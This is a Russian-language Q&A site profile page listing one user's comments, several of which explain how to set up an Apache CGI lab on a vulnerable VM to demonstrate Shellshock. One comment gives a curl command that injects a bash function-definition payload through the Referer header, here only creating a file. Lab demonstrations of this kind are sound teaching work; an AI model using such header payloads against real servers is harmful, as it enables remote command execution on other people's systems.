Все сервисы Хабра
Сообщество IT-специалистов
Ответы на любые вопросы об IT
Профессиональное развитие в IT
Закрыть
Задать вопрос
Den
student
0
вклад
1
вопрос
0
ответов
0%
решений
Комментарии
Информация
Ответы
Вопросы
Комментарии
Подписки
Нравится
Си или Go для приложения по обработке сетевого трафика до 1.5М пакетов/с?
Den
@doggy-style
пункты 3, 4 относятся и к Си
Написано
более трёх лет назад
С помощью чего создать подобный эффект?
Den
@doggy-style
Автор вопроса
спасибо !
как всё просто оказалось =)
Написано
более трёх лет назад
Debian Linux - Стенд демонстрации shellshock'a ?
Den
@doggy-style
largotek
: всё уже, нечего больше настраивать.
cgi скрипты нужны. без них не получится.
Написано
более трёх лет назад
Debian Linux - Стенд демонстрации shellshock'a ?
Den
@doggy-style
largotek
: почему не получается ? ты же демонстрируешь -- настрой всё под себя.
Написано
более трёх лет назад
Debian Linux - Стенд демонстрации shellshock'a ?
Den
@doggy-style
largotek
: тостер скушал теги, вот :
pastebin.com/BDrR3UBB
Написано
более трёх лет назад
Debian Linux - Стенд демонстрации shellshock'a ?
Den
@doggy-style
largotek
:
На уязвимой виртуалке пропиши в /usr/local/apache/conf/httpd.conf
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
SetHandler cgi-script
OPtions +ExecCGI
Order allow,deny
Allow from all
Создай папку /usr/local/apache/cgi-bin если её нет.
Положи туда file.cgi
с содержанием
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello"
дай ему права chmod 755 file.cgi
С другой виртуалки проверь доступен ли созданный скрипт. В браузере отрой url /cgi-bin/file.cgi.
Потом попробуй проверить работает ли уязвимость или нет.
Например, можно попробовать файл создать
curl -k -H 'Referer:() { :; }; /bin/bash -c "touch 1111111.txt"' /cgi-bin/file.cgi
Можно попробовать другие заголовки. Ну в статьях видел наверное.
Написано
более трёх лет назад
Войдите на сайт
Чтобы задать вопрос и получить на него квалифицированный ответ.
Войти через центр авторизации
Закрыть
Реклама
